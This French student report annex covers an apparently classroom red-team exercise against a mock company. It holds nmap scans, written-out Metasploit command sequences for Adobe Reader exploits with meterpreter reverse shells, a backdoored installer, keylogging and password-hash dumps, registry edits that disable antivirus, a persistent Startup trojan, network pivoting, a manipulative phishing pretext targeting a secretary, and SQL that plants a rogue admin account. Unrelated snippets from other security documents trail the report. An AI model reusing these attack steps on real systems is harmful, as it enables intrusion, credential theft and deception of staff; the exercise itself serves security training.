ANALYSE DU RESEAU VIA NMAP ( C1
|
|
|
- Corentin Pellerin
- il y a 10 ans
- Total affichages :
Transcription
1 ANNEXES A01 ANALYSE DU RESEAU VIA NMAP (C1) page 02 A02 ATTAQUE.PDF (C1) page 06 A03 ATTAQUES «MAQUETTE» EXEMPLE (C2) page 10 A04 INJECTION SQL (C2) page 26
2 A01 ANALYSE DU RESEAU VIA NMAP (C1) «NMAP est un scanner de ports open source créé par Fyodor et distribué par Insecure.org. Il est conçu pour détecter les ports ouverts, identifier les services hébergés et obtenir des informations sur le système d'exploitation d'un ordinateur distant. Ce logiciel est devenu une référence pour les administrateurs réseaux car l'audit des résultats de NMAP fournit des indications sur la sécurité d'un réseau. Il est disponible sous Windows, Mac OS X, Linux, BSD et Solaris. Pour scanner les ports d'un ordinateur distant, NMAP utilise diverses techniques d'analyse basées sur des protocoles tels que TCP, IP, UDP ou ICMP. De même, il se base sur les réponses particulières qu'il obtient à des requêtes particulières pour obtenir une empreinte de la pile IP, souvent spécifique du système qui l'utilise. C'est par cette méthode que l'outil permet de reconnaitre la version d'un système d'exploitation et aussi la version des services en écoute. Le code source est disponible sous la licence GNU GPL.» WIKI. 1. SCRIPTS NMAP DE GENERATION DE BRUIT VERS LA MACHINE FRONTALE : for x in `seq 1 200` do nmap -vv -A & done 2. COMPTE RENDU NMAP DE L ANALYSE DE : Starting Nmap 5.35DC1 ( ) at :04 CEST NSE: Loaded 49 scripts for scanning. Initiating Ping Scan at 09:04 Scanning [4 ports] Completed Ping Scan at 09:04, 0.02s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 09:04 Completed Parallel DNS resolution of 1 host. at 09:04, 0.00s elapsed Initiating SYN Stealth Scan at 09:04 Scanning [1000 ports] Discovered open port 22/tcp on Discovered open port 80/tcp on Discovered open port 25/tcp on Discovered open port 1720/tcp on Discovered open port 23/tcp on Discovered open port 53/tcp on Increasing send delay for from 0 to 5 due to 15 out of 50 dropped probes since last increase. Discovered open port 5061/tcp on Discovered open port 3001/tcp on Discovered open port 5060/tcp on Completed SYN Stealth Scan at 09:05, 8.26s elapsed (1000 total ports) Initiating Service scan at 09:05 Scanning 9 services on Completed Service scan at 09:07, s elapsed (9 services on 1 host) Initiating OS detection (try #1) against Retrying OS detection (try #2) against Retrying OS detection (try #3) against
3 Retrying OS detection (try #4) against Retrying OS detection (try #5) against Initiating Traceroute at 09:07 Completed Traceroute at 09:07, 0.01s elapsed Initiating Parallel DNS resolution of 1 host. at 09:07 Completed Parallel DNS resolution of 1 host. at 09:07, 0.00s elapsed NSE: Script scanning NSE: Starting runlevel 1 (of 1) scan. Initiating NSE at 09:07 Completed NSE at 09:07, 0.97s elapsed Nmap scan report for Host is up (0.0021s latency). Scanned at :04:53 CEST for 142s Not shown: 987 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh Cisco SSH 1.25 (protocol 2.0) ssh-hostkey: :eb:aa:62:32:c4:b7:d1:63:e8:50:f2:47:e4:2e:51 (RSA) _ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLeCbbqjJvC6dAIkrKI5/EiizUV0Sib1DCUNUKkqfJWN 1BVflNW/xEQLwrRf8ZgfOrxd+1pykVf433ivWK9WW/+ntgRKCE5gD6Q8rjijTHRXktsMgVc6LFo/ MdQnbbk3R8/4qmIHaxvUnThAcW70l90yRx2/HHO0xttz1JLeDLrou98vuPmhCKvdvt0eNGLcIw RQHTiZ3Ylo2tEU30+2TGSwte8JRiDn+5Q8bxKTFDL1OaFyqs3EBmsVbnwzM5ojANzC162RT38n 7RjjN3ozHCJ3kFrxeo75rHSNGLQwIbWgBmv712gIcWl12t19jDOZ1vTzLHaqMXe8TaRwMtFYqt 23/tcp open telnet Cisco router 25/tcp open smtp? _smtp-commands: Couldn't establish connection on port 25 53/tcp open domain ISC BIND P2 80/tcp open http Apache httpd ((Debian)) _http-methods: GET HEAD POST OPTIONS _html-title: AeroDef.fr - Consultants en aéronautique 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 445/tcp filtered microsoft-ds 1025/tcp filtered NFS-or-IIS 1720/tcp open H.323/Q.931? 3001/tcp open ssh OpenSSH 5.5p1 Debian 4 (protocol 2.0) ssh-hostkey: 1024 eb:07:88:a6:95:66:ad:a9:29:ed:ca:a9:1f:a9:d8:66 (DSA) ssh-dss AAAAB3NzaC1kc3MAAACBANyejsfoHhkPii0fKYey+9xST/4bU9RvsYH8N91xIYVO1d1HWupne7 E0W5zhwqqWyNe6s+54Oju30jXtuSLHa98GhlBT9gNksxGAT7yPXCz33f/0w8r4eHc/qxxIkzDrF/p EfytEQzkAsgA536tn7SlYjS9wl/BW4ZAemjGTPZ4PAAAAFQDSU0KXh5zw5maML9ZIcd1Gg15+r QAAAIA/q7OTNvFnmmifT2SNk37r6XqstQeekUE+D7yXhlqfbRuNkuJFvR6WpAty9ctzcYIyFMjOo IhyRoUUxaE4kARCx0TLTTz0jRiU1+V96A1jq+5NZolNl2OU+26sS9KoXIS1T7snBeKXYrufBBlXTB2i GWE9QSUvU2JReJ2vmRE04AAAAIB+dPM/+1mP6VEi2JesUrUGRJRXkXJymMqcctXlwUJurO4H MVm7NrOY2lUZgI4NMyPfesKK3+r9sFfGUgN5C1Anb5keKDkW5lJe6rXBOe+UMa2xPrs9TwIvCI ypoekc7xyh+vluht/qnxoacc2rmuz46ly7kyjg03kjopipfbpdqa== 2048 d2:84:9a:19:3b:3c:5c:07:b1:3f:cf:60:03:02:47:d7 (RSA) _ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDjA1vcE+G6Fowir2tANj2ImXUlxZYyaOr0VzHEZ4r0lq 9hOscfIWex68lNtMDufCPpNyTGftTGV/qHo3qI1lFevDgGtX+nhTBxB7T8/XtGFeTEuJBQsehRmI Xyhn5+Z2CBt4GerCkhXvZHLp6ZzJAsTGEN60N9BDG4AeY8TVd1gikq8zOri8lELt4fkLczK7BYnul2s 3
4 zjrtdlk96v5temlaecx7flgizo6/lrbvapnj08n8l3zgfrtabbkxxejawwhg/fcrhjxtukzsmapzp QZHku4S8P22grhkCw2N5bAZYKNY4MDz7/3iLf+eRQczMxw998MsFpExpmarUxLw4sb 5060/tcp open sip-proxy Cisco SIP Gateway (IOS 12.x) 5061/tcp open tcpwrapped No exact OS matches for host (If you know what OS is running on it, see ). TCP/IP fingerprint: OS:SCAN(V=5.35DC1%D=10/11%OT=22%CT=1%CU=38943%PV=Y%DS=1%DC=T%G=Y%TM=4 CB2B7A OS:3%P=i686-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10A%TI=RD%CI=RI%II=RI%TS=U)SE OS:Q(SP=106%GCD=1%ISR=10B%TI=RD%CI=RI%II=RI%TS=U)SEQ(SP=106%GCD=1%ISR=10A% T OS:I=RD%CI=RI%II=RI%TS=U)SEQ(SP=FD%GCD=1%ISR=10C%TI=RD%CI=RI%II=RI%TS=U)SEQ OS:(SP=107%GCD=1%ISR=10D%TI=RD%II=RI%TS=U)OPS(O1=M218%O2=M218%O3=M218%O 4=M2 OS:18%O5=M218%O6=M109)WIN(W1=1020%W2=1020%W3=1020%W4=1020%W5=1020% W6=1020)E OS:CN(R=Y%DF=N%T=100%W=1020%O=M218%CC=N%Q=)T1(R=Y%DF=N%T=100%S=O%A=S +%F=AS% OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=42%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5 (R=Y OS:%DF=N%T=100%W=0%S=A%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=42%W=0%S= A%A=Z%F= OS:R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=100%IPL=38%UN=0%RIPL=G%RID=G%RIPCK =G%R OS:UCK=G%RUD=G)IE(R=Y%DFI=S%T=100%CD=S) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=263 (Good luck!) IP ID Sequence Generation: Randomized Service Info: OSs: IOS, Linux; Device: router TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS ms Read data files from: /usr/share/nmap OS and Service detection performed. Please report any incorrect results at Nmap done: 1 IP address (1 host up) scanned in seconds Raw packets sent: 1209 (57.422KB) Rcvd: 1076 (44.590KB) 3. COMPLEMENTS : NESSUS SCAN (reports) SOURCE : WIKI. NESSUS est un outil de sécurité informatique. Il signale les faiblesses potentielles ou avérées sur les machines testées. Ceci inclut, entre autres : Les services vulnérables à des attaques permettant la prise de contrôle de la machine, l'accès à des informations sensibles (lecture de fichiers confidentiels par exemple), des dénis de service... Les fautes de configuration (relais de messagerie ouvert par exemple). Les patchs de sécurité non appliqués, que les failles corrigées soient exploitables ou non dans la configuration testée. 4
5 Les mots de passe par défaut, quelques mots de passe communs, et l'absence de mots de passe sur certains comptes systèmes. NESSUS peut aussi appeler le programme externe Hydra pour attaquer les mots de passe à l'aide d'un dictionnaire. Les services jugés faibles (on suggère par exemple de remplacer Telnet par SSH). Les dénis de service contre la pile TCP/IP Nous allons voir ci-dessous un extrait de rapport de scan (très long en complet) effectué avec le logiciel NESSUS, le fichier rendu est une page Web au format.htm : Résumé du scan : vulnérabilités de classe «MEDIUM» trouvées Exemple de vulnérabilité «MEDIUM» avec solution possible apportée 5
6 1. ATTAQUE N 01 :.EXE MALVEILLANT A02 ATTAQUE.PDF (C1) Remarque : attaque improvisée lorsqu ils nous ont demandé de leur fournir ADOBE Acrobat Reader v Action : Création d une backdoor de type «Reverse_TCP» à partir de l exécutable A-Reader Résultat : Un début de connexion mais rien de plus (cause : pare-feu personnel?). Observation : Ils ont testé l exécutable sur une machine hors du périmètre de Candide SA. En effet, la connexion initialisée provient de l adresse IP (et non pas ). Curiosité : Le groupe Défense arrive à installer ADOBE Acrobat Reader avec notre backdoor!!! FABULEUX. 2. ATTAQUE N 02 :.PDF VIA WEB 6 (voir page suivante)
7 Action : DNS spoofing (avec Ettercap sur notre machine du réseau opérateur) + redirection vers une page PDF piratée pour exploiter la faille d ADOBE Acrobat Reader v9.3.4 : Obtenir des backdoors sur les machines de Candide SA. Dénis de service de l accès Internet de Candide SA. Commandes de l exploit : msfconsole use windows/browser/adobe_cooltype_sing set payload windows/meterpreter/reverse_tcp set lhost set srvhost set srvport 80 set uripath / set lport 3500 exploit Résultat : Le DNS spoofing a parfaitement fonctionné mais le résultat final n a pas été celui escompté. En effet, nous avons créé un déni de service mais l exploit «adobe_cooltype_sing» n a pas généré de connexion sur les machines distantes. Causes possibles de l échec : Parefeu personnel? Type des navigateurs Internet (IExplorer/Firefox)? Version des navigateurs? Observation : Le déni de service leur a fait perdre un temps certain. 3. ATTAQUE N 03 : UTILISATION DU FICHIER.PDF MALVEILLANT Action : Faire exécuter par la défense un.pdf malveillant : Obtenir une backdoor sur la machine victime. 7
8 Commandes de l exploit : msfconsole use windows/fileformat/adobe_cooltype_sing set filename cv.pdf set outputpath /root/ set lhost set lport 7878 exploit msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost set lport 7878 exploit Résultat : Succès partiel. L antivirus (AVG) a détecté que le fichier.pdf était malveillant. Cependant après exécution du.pdf (imaginons une personne qui ne comprend pas l alerte :D), nous obtenons un contrôle total sur la machine. 8
9 Résultat du Keyscan : meterpreter > keyscan_dump Dumping captured keystrokes... capture <N3> <CapsLock> fuck <Down> Résultat du HashDump : meterpreter > hashdump Administrateur:500:49d2a0324f23b86eaad3b435b51404ee:828b4b8135f4fb3dcd4f32667ea 5d26f::: HelpAssistant:1000:a664853addcc12c077d1d307ceacc3d9:0e91acbe05e346ad3de c816e::: Invit?:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0>?:1002:aad3b435b51404eeaad3b435b51404ee:e0be1bbd173659a718 be7110c14b0299::: XpDefense:1003:fb4bdb515cca9c2daad3b435b51404ee:2c0323c719dcc823630cb67e827a5 4f4::: Décryptage de la Hash table avec OPHCRACK : 9
10 A03 ATTAQUES «MAQUETTE» EXEMPLE (C2) Plan des attaques prévu : EXPLOIT CVE Contexte : la victime ouvre un lien à partir de son navigateur Internet Explorer. Le lien pointe vers le serveur pirate. Objectif : mettre en évidence la défaillance possible d un système de protection que l utilisateur pense fiable. Particularité : alerte AVG mais impossibilité pour lui de contrer l attaque!!! EXPLOIT CVE Contexte : la victime ouvre un lien à partir de son navigateur Internet Explorer 6 ou 7. Le lien pointe vers le serveur pirate. Objectif : Exploiter une faille 0day. Rendre hors service l antivirus et obtenir un accès distant permanent sur la machine victime, même après un redémarrage. Particularité : absolument aucune action n est attendue de la part de la victime et BYPASS AVG!!! METHODE DU «PIVOT» Contexte : on se sert d une machine corrompue dans leur domaine pour attaquer leur serveur 2003 (et autres systèmes présents sur le LAN ). Objectif : corrompre le plus de machines possibles à partir d un poste infecté (s infiltrer en profondeur dans leur système d information). Pour réaliser ces attaques, imaginons le scénario suivant : Le «pirate» se rend à l accueil de la société AERODEF afin de pratiquer l art du social eneegering (oui, nous trouvons que c est un art :D). Il repère rapidement sa cible, il s agit de la secrétaire, plutôt mignonne et très souriante. Il engage très vite la conversation et prétexte qu il a un petit problème avec son ordinateur. Lorsqu il lui demande si elle peut l aider, elle éclate de rire en lui révélant qu elle n y connait absolument rien. Reste plus qu à obtenir son adresse mail grâce à une technique de drague gardée secrète Durant la conversation, le pirate aura aussi pris soin de remarquer un élément personnel appartenant à la secrétaire : la photo de son cheval. À partir de là, il suffit de lui envoyer un sympathique mail parlant d équitation, de poneys, et celle-ci, toute excitée par le sujet en question, cliquera sans hésitation sur notre lien totalement piégé. OWNED!!! Tout d abord, notre victime voir page suivante!!! 10
11 11
12 EXPLOIT CVE Cet exploit permet la prise de contrôle à distance d un système respectant les conditions énoncées ci-après. Le système d exploitation de la victime doit être un Windows XP, QuickTime 7.6.6/7.6.7 doit être installé et l utilisateur doit utiliser le navigateur Internet Explorer lorsqu il clique sur le lien piégé. Ci-dessous, le descriptif fourni sur le site Web de METASPLOIT : Maintenant, voila à quoi ressemble la page Web hébergée sur notre «serveur de pirate» : 12
13 L exploit démarre lorsque la cible clique sur «OK» suite à ce message : «Click to run an ActiveX control on this webpage». Objectivement, rien de bien suspect pour un utilisateur lambda car le message provient d Internet Explorer lui-même. Côté pirate, l exploit est généré à partir de METASPLOIT comme montré dans la capture ci-dessous : Remarque : la dernière ligne correspond au début de l attaque. On peut voir que la victime possède l adresse IP
14 Coté victime, l exploit déclenche une alerte AVG! Pas très discret Cependant, lorsque l utilisateur essaye de déplacer le virus en quarantaine, l action échoue! L antivirus ne parvient pas à bloquer notre attaque! Voyons-voir cela côté BACKTRACK Succès! Comme vous pouvez le voir ci-dessous, une session est désormais établie avec la machine attaquée : 14
15 Détails : Nom du domaine : DOMAINE. Utilisateur piraté : user1. Nom de la machine : TARGETSTYLE. Connexion (@IP : n port) : : : Au final, l alerte est donnée mais l intrus est bel et bien dans la place. A partir de là, la pérennité du système d information attaqué dépendra du comportement de l utilisateur piraté : osera t il prévenir l administrateur réseau que son antivirus a détecté une menace alors qu il surfait sur un site qui n a rien à voir avec son travail? Maintenant passons à un exploit 0day (09/11/2010)!!! EXPLOIT CVE Cet exploit permet la prise de contrôle à distance d un système respectant les conditions énoncées ci-après. Le système d exploitation de la victime doit être un Windows XP et l utilisateur doit utiliser le navigateur Internet Explorer version 6 ou 7 lorsqu il clique sur le lien. Ci-dessous, le descriptif fourni sur le site de METASPLOIT : 15
16 Maintenant, voila à quoi ressemble la page web hébergée sur notre «serveur de super pirate» : Comme vous pouvez le remarquer nous obtenons une session sans que l utilisateur n ait eu à faire quoi que ce soit. L antivirus n a pas non plus détecté de menaces : l exploit est «BYPASS» en ce qui concerne AVG!!! Voir page suivante pour la suite du régal : 16
17 Cette fois-ci allons plus loin et voyons quelques exemples de ce que nous pouvons obtenir à partir d une machine corrompue : HASHDUMP HASHDUMP sert à récupérer les LM «hashes» qui sont utilisés par Windows pour stocker les mots de passe des différents comptes de façon sécurisée (cryptage via md5). Sous Windows XP, on parle de base SAM (Security Account Manager). Remarque : la base SAM ne contient que les mots de passe cryptés des utilisateurs locaux et non ceux du domaine 17
18 Il faut ensuite utiliser un logiciel pour décrypter les mots de passe obtenus. Pour les LM hashes de Windows XP, le mieux est d utiliser «OPHCRACK» avec les «RAINBOW TABLES» appropriées (une table arc-en-ciel, aussi appelée RAINBOW TABLE, est, en cryptologie, une structure de données créée en 2003 par Philippe OECHSLIN pour retrouver un mot de passe à partir de son empreinte. Il s'agit d'une amélioration des compromis tempsmémoire proposés par Martin HELLMAN dans les années 1980). Ci-dessous, vous pouvez remarquer qu il aura fallu moins de quatre minutes à OPHCRACK pour trouver le mot de passe de l administrateur local de la machine : Vhpà100%. KEYSCAN KEYSCAN permet de récupérer toutes les touches tapées au clavier : 18
19 VOL D INFORMATIONS/DOCUMENTS Il est possible de se déplacer dans le système de fichier à la recherche d informations sensibles. Les commandes sont celles d UNIX : ls, cd, etc Dans l exemple ci-dessus, nous téléchargeons un dossier nommé «TopSecret» et nous prenons une capture d écran de la machine attaquée. La capture d écran permet de récupérer des informations précieuses telles que le type d antivirus la présence ou non d un pare-feu personnel, les logiciels utilisés, etc Remarque : c est comme cela que n avons pu savoir (après la première confrontation) que l équipe de défense utilisait l antivirus AVG. En y repensant, un «ps aux» aurait été tout aussi utile. INFORMATIONS RESEAUX Il est aussi possible d obtenir un SHELL Windows ave la commande «shell». Pratique pour tout ce qui est informations réseaux. DESACTIVER L ANTIVIRUS Ci-dessous, nous supprimons dans le registre la clé qui permet le démarrage automatique des programmes (antivirus compris), ainsi que toutes les entrées relatives à AVG : 19
20 INSTALLER UNE «BACKDOOR» PERSISTANTE Création d un cheval de Troie à partir d un exécutable légitime (putty.exe) : Démarrage du «listenner» en attente d une future session : 20
21 Ensuite, nous téléchargeons le cheval de Troie généré vers le dossier «Startup» de la victime (notre XP de test est une version anglaise). Notre exécutable se lancera ainsi automatiquement à chaque démarrage de la machine et nous récupérerons l accès. Voyons cela au redémarrage de la machine : 21
22 Avant que la victime n ai eu le temps de démarrer manuellement AVG, nous supprimons l exécutable qui permet de lancer l antivirus (avgtray.exe) et nous le remplaçons par notepad.exe (renommé pour l occasion ) : Comme vous pouvez le voir ci-dessous, lorsque l utilisateur souhaite lancer AVG, c est Notepad qui s ouvre ^^ : 22
23 METHODE DU PIVOT Le principe est de rajouter sur notre machine BACKTRACK une route vers le réseau privé de l entreprise attaquée, la passerelle étant la session établie avec l hôte infecté. Cidessous nous scannons le réseau privé à la recherche d équipements à attaquer : 23
24 Lorsqu une cible a été choisie, ici un serveur 2003, nous lançons l exploit «ms08_067_netapi» qui permet dans certains cas de profiter d une faille du protocole Samba (port 445). La particularité de cette attaque et qu elle ne nécessite aucune action de la part de notre potentielle victime. Dans l exemple ci-dessus, l exploit n a pas été un succès : aucune session n a été créée. Pour en connaître la raison nous utilisons une commande qui permet d afficher les systèmes Windows vulnérables : 24
25 Notre serveur 2003 utilisé pour cette maquette est une version française dotée du SP2. Cet échec est donc tout à fait normal. Il va donc falloir plus de temps à notre pirate pour étendre son contrôle. Il lui suffit de se créer un accès permanent à la machine infectée (comme vu précédemment) afin de tenter avec une nouvelle attaque. WEBOGRAPHIE :
26 A04 INJECTION SQL (C2) Les informations récupérées dans les messages échangés entre les acteurs du groupe de défense nous ont permis de recréer à l identique le portail Web et la base de données déployée par ces derniers. Le maquettage nous a aussi permis de préparer au mieux nos scripts malveillants qui ont été utilisés lors de la deuxième confrontation. Voici un aperçu du site Web AERODEF avant intrusion : DEFINITION DE L ATTAQUE : Le but de cette attaque est d injecter des nouvelles sur la page d accueil du portail Web AERODEF tout en faisant croire qu il ne s agit que d une simple injection SQL. La défense ne sachant pas que nous avons les accès à la base de données, nous voulons les amener à penser qu il y a des failles dans la conception de leur site Web. CREATION D UN COMPTE : Pour insérer des nouvelles nous avons besoin d utiliser un compte déjà existant. Donc nous avons commencé par créer un compte de type «administrateur» à notre nom. Ce compte nous a permis de diffuser des news à notre nom. Il nous a aussi permis d avoir accès à la partie administration de leur site Web. Voici les commandes de création du compte : INSERT INTO `users` (`firstname`, `lastname`, ` `, `password`, `group`) VALUES ('LaTeam', 'Attaque', 'Attaque@Crème.fr', MD5('SecuAttaque'), 0, 1); 26
27 Coucou, nous voici dans la base de données!!! INSERTION DES «NEWS» : Accès à l espace d administration Le site étant incomplet, dans le sens où il n y a pas d outils Web permettant d insérer les news, nous avons donc exécuté le code directement sur PhpMyAdmin (voir page suivante) : 27
28 DIFFICULTES RENCONTREES : La veille de la confrontation, la défense avait changé le mot de passe de connexion à la base de données. Nous avons tout de même pu le récupérer dans leurs derniers échanges de mail. Nous voulions aussi ne pas apparaître dans les logs de connexions de PhpMyAdmin donc nous avons tout d abord exécuté nos script PHP sur le serveur Web de notre maquette. Mais cela n a pas fonctionné. Les scripts ont réussis à se connecter à leur base de données mais les requêtes SQL n ont pas été exécutées. Nous pensons que le firewall de la défense a été configuré de sorte à droper toutes les requêtes SQL externes à leur réseau. Nous les avons donc exécutées directement sur leur serveur au travers de PhpMyAdmin, malgré le risque de laisser des traces sur notre passage. Il y a eu de légers changements dans une des tables de la base de données. Nous avons donc eu à changer le code de nos requêtes d injection afin qu elles s exécutent correctement. 28
Fonctionnement de Iptables. Exercices sécurité. Exercice 1
Exercice 1 Exercices sécurité 1. Parmi les affirmations suivantes, lesquelles correspondent à des (bonnes) stratégies de défenses? a) Il vaut mieux interdire tout ce qui n'est pas explicitement permis.
TEST D INTRUISION. Document Technique
Document Technique TEST D INTRUISION Préparé et présenté par AMINATA THIAM 3 ème année Sécurité de la Technologie de l Information, la Cité Collégiale Cours analyse des risques et vulnérabilités Mars 2012
Sécurité des réseaux Les attaques
Sécurité des réseaux Les attaques A. Guermouche A. Guermouche Cours 2 : Les attaques 1 Plan 1. Les attaques? 2. Quelques cas concrets DNS : Failles & dangers 3. honeypot A. Guermouche Cours 2 : Les attaques
Atelier Pivoting KHOULOUD GATTOUSSI (RT3) ASMA LAHBIB (RT3) KHAOULA BLEL (RT3) KARIMA MAALAOUI (RT3)
Atelier Pivoting KHOULOUD GATTOUSSI (RT3) ASMA LAHBIB (RT3) KHAOULA BLEL (RT3) KARIMA MAALAOUI (RT3) Table des matières 1. Présentation de l atelier... 2 2. Présentation des outils utilisés... 2 a. GNS3
Nmap (Network Mapper) Outil d exploration réseau et scanneur de ports/sécurité
Nmap (Network Mapper) Outil d exploration réseau et scanneur de ports/sécurité 1. Présentation Nmap est un outil open source d'exploration réseau et d'audit de sécurité, utilisé pour scanner de grands
Tutoriel sur Retina Network Security Scanner
Département de Mathématiques Informatique Master 2 RIP filière «Réseaux» Cours «Sécurité des réseaux et des contenus multimédia» Responsable du module : Mr Osman SALEM Tutoriel sur Retina Network Security
SECURIDAY 2013 Cyber War
Club de la Sécurité Informatique à l INSAT Dans le cadre de la 3ème édition de la journée nationale de la sécurité informatique SECURIDAY 2013 Cyber War SECURINETS Présente Formateurs: 1. Trabelsi NAJET
LINUX - Sécurité. Déroulé de l'action. - 3 jours - Contenu de formation
Objectif : Tout administrateur système et réseau souhaitant avoir une vision d'ensemble des problèmes de sécurité informatique et des solutions existantes dans l'environnement Linux. Prérequis : Connaissance
DIGITAL NETWORK. Le Idle Host Scan
DIGITAL NETWORK Siège : 13 chemin de Fardeloup 13600 La Ciotat Siret : 43425494200015 APE : 722 Z www.digital network.org www.dnsi.info Laboratoires : 120 Avenue du Marin Blanc, ZI Les Paluds, 13685 Aubagne
Formation en Sécurité Informatique
Formation en Sécurité Informatique FreeWays Security Club MAIL: [email protected] Contenu 1- Comprendre le terrain 2- Metasploit 3- NeXpose a- Installation du serveur NeXpose b- IHM de la console
SECURIDAY 2012 Pro Edition
SECURINETS CLUB DE LA SECURITE INFORMATIQUE INSAT SECURIDAY 2012 Pro Edition [Information Gathering via Metasploit] Chef Atelier : Nihel AKREMI (RT 3) Baha Eddine BOUKHZAR(RT 2) Sana GADDOUMI (RT 4) Safa
Outils d'analyse de la sécurité des réseaux. HADJALI Anis VESA Vlad
Outils d'analyse de la sécurité des réseaux HADJALI Anis VESA Vlad Plan Introduction Scanneurs de port Les systèmes de détection d'intrusion (SDI) Les renifleurs (sniffer) Exemples d'utilisation Conclusions
Firewall IDS Architecture. Assurer le contrôle des connexions au. [email protected] Sécurité 1
Sécurité Firewall IDS Architecture sécurisée d un réseau Assurer le contrôle des connexions au réseau [email protected] Sécurité 1 Sommaire général Mise en oeuvre d une politique de sécurité
Surveillance stratégique des programmes malveillants avec Nessus, PVS et LCE
Surveillance stratégique des programmes malveillants avec Nessus, PVS et LCE 19 mars 2013 (Révision 3) Sommaire Présentation 3 Nessus 3 Détection des programmes malveillants... 3 Détection des réseaux
Rapport d audit de sécurité
Par Zenk Rapport d audit de sécurité Pour Widgets Inc. bik3te pour Zenk 20/07/2010 Sommaire 1. Prise d informations... 3 2. Recherche de vulnérabilités... 6 3. Exploitation des vulnérabilités... 7 1. Prise
Linux. Sécuriser un réseau. 3 e édition. l Admin. Cahiers. Bernard Boutherin Benoit Delaunay. Collection dirigée par Nat Makarévitch
Bernard Boutherin Benoit Delaunay Cahiers de l Admin Linux Sécuriser un réseau 3 e édition Collection dirigée par Nat Makarévitch Groupe Eyrolles, 2003, 2004, 2007, ISBN : 2-212-11960-7, ISBN 13 : 978-2-212-11960-2
Le scan de vulnérabilité
4 Le scan de vulnérabilité Sommaire Le scan de vulnérabilité de base Scan avec NeXpose L assistant "nouveau site" Le nouvel assistant pour les scans manuels Scan avec Nessus Scanners de vulnérabilité spécialisés
Outils. Préliminaires. fr linux english web ctf Shellcodes crypto win pentest openssl. 1 sur 14 24/05/2012 00:05
1 sur 14 24/05/2012 00:05 Partager Signaler un abus Blog suivant» Créer un blog Connexion VENDREDI 4 JUIN 2010 tutoriel injection SQL - LampSecurity CTF6 Le site LAMPSecurity.org propose des défis de type
Netfilter & Iptables. Théorie Firewall. Autoriser le trafic entrant d'une connexion déjà établie. Permettre le trafic entrant sur un port spécifique
Page 1 sur 5 Article original traduit par Kmeleon, refonte de eks. Provenant de ubuntu-fr.org Netfilter & Iptables Netfilter est un module du noyau Linux (depuis la version 2.4) qui offre la possibilité
DenyAll Detect. Documentation technique 27/07/2015
DenyAll Detect Documentation technique 27/07/2015 Sommaire 1. A propos de ce document... 3 1.1 Objet... 3 1.2 Historique... 3 1.3 Contexte... 3 2. Liste des tests... 4 2.1 Découverte réseau (scan de ports)...
Table des matières. Avant-propos... Préface... XIII. Remerciements...
Avant-propos... XI Préface... XIII Remerciements... XV Introduction... XVII Pourquoi faire un pentest?... XVII Pourquoi Metasploit?... XVII Un bref historique de Metasploit.... XVIII À propos de ce livre...
Rapport de projet Prise en main, configuration et évaluation des performances d un
Rapport de projet Prise en main, configuration et évaluation des performances d un Framework logiciel de gestion de la sécurité d un SSI dans le cadre d un réseau d'entreprise privé BIKOUO Aubin FAVIER
Serveur de messagerie sous Debian 5.0
Serveur de messagerie sous Debian 5.0 Avec Postfix et une connexion sécurisée GEORGET DAMIEN ET ANTHONY DIJOUX 06/10/2009 [Tutorial d installation d un serveur de messagerie POP et SMTP sous Debian, avec
2. MAQUETTAGE DES SOLUTIONS CONSTRUCTIVES. 2.2 Architecture fonctionnelle d un système communicant. http://robert.cireddu.free.
2. MAQUETTAGE DES SOLUTIONS CONSTRUCTIVES 2.2 Architecture fonctionnelle d un système communicant Page:1/11 http://robert.cireddu.free.fr/sin LES DÉFENSES Objectifs du COURS : Ce cours traitera essentiellement
L outil Nmap-Stateful. Olivier Courtay Thomson R&D / IRISA
L outil Nmap-Stateful Olivier Courtay Thomson R&D / IRISA Page N 1 Plan Introduction Nmap-Stateful: Principe et Fonctionnement Méthodes et Résultats Prospective Conclusion Page N 2 Nmap Outil réseau classique
Figure 1a. Réseau intranet avec pare feu et NAT.
TD : Sécurité réseau avec Pare Feu, NAT et DMZ 1. Principes de fonctionnement de la sécurité réseau Historiquement, ni le réseau Internet, ni aucun des protocoles de la suite TCP/IP n était sécurisé. L
1/ Introduction. 2/ Schéma du réseau
1/ Introduction FWBuilder est un logiciel-libre multi-plateforme qui permet de créer ses propres pare-feux et les utiliser sur différents SE ou sur du matériel informatique. Objectif : Créer un pare-feu
SSH, le shell sécurisé
, le shell sécurisé Objectifs : 1. Présenter le protocole et les outils associés Sébastien JEAN Pourquoi 1/2? Les services standards ne supportent que peu de propriétés de sécurité souvent l identification,
Réseaux. Moyens de sécurisation. Plan. Evolutions topologiques des réseaux locaux
Réseaux Evolutions topologiques des réseaux locaux Plan Infrastructures d entreprises Routeurs et Firewall Topologie et DMZ Proxy VPN PPTP IPSEC VPN SSL Du concentrateur à la commutation Hubs et switchs
FORMATION PROFESSIONNELLE AU HACKING
FORMATION PROFESSIONNELLE AU HACKING BRIEFING Dans un monde où la science et la technologie évolue de façons exponentielle, les informaticiens et surtout les administrateurs des systèmes informatique (Réseau,
Manuel des logiciels de transferts de fichiers File Delivery Services
Manuel des logiciels de transferts de fichiers File Delivery Services Editeur La Poste CH SA Technologies de l information Webergutstrasse 12 CH-3030 Berne (Zollikofen) Contact La Poste CH SA Technologies
Tunnels et VPN. 22/01/2009 Formation Permanente Paris6 86
Tunnels et VPN 22/01/2009 Formation Permanente Paris6 86 Sécurisation des communications Remplacement ou sécurisation de tous les protocoles ne chiffrant pas l authentification + éventuellement chiffrement
La collecte d informations
La collecte d informations Nous allons décrire le fonctionnement des outils permettant de récupérer des informations à distance. Ces utilitaires sont fréquemment utilisés par les pirates pour préparer
Accès aux ressources informatiques de l ENSEEIHT à distance
